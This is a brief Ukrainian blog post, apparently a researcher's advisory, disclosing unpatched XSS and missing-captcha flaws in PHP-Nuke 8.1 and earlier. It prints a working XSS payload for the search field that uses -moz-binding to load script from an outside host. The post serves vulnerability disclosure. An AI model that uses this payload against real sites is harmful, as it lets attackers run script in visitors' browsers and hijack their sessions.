XSS та IAA уразливості в PHP-Nuke

15:01 11.01.2011

28.10.2010

У березні, 21.03.2010, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості в PHP-Nuke. Які я виявив на одному сайті, а нещодавно перевірив їх на офіційному сайті phpnuke.org. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливість в PHP-Nuke.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

11.01.2011

XSS:

POST запит на сторінці http://site/modules.php?name=Search

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі пошуку.

Це версія для Mozilla та Firefox (до 3.0), використовуючи MouseOverJacking можна зробити версію для всіх браузерів.

Insufficient Anti-automation:

http://site/modules.php?name=Feedback

В формі немає захисту від автоматизованих запитів (капчі).

Уразливі PHP-Nuke 8.1 та попередні версії (перевірено в PHP-Nuke 8.0 та 8.1).

Дані уразливості досі не виправлені розробниками PHP-Nuke - ні в своїй системі, ні в себе на сайті.


Leave a Reply

You must be logged in to post a comment.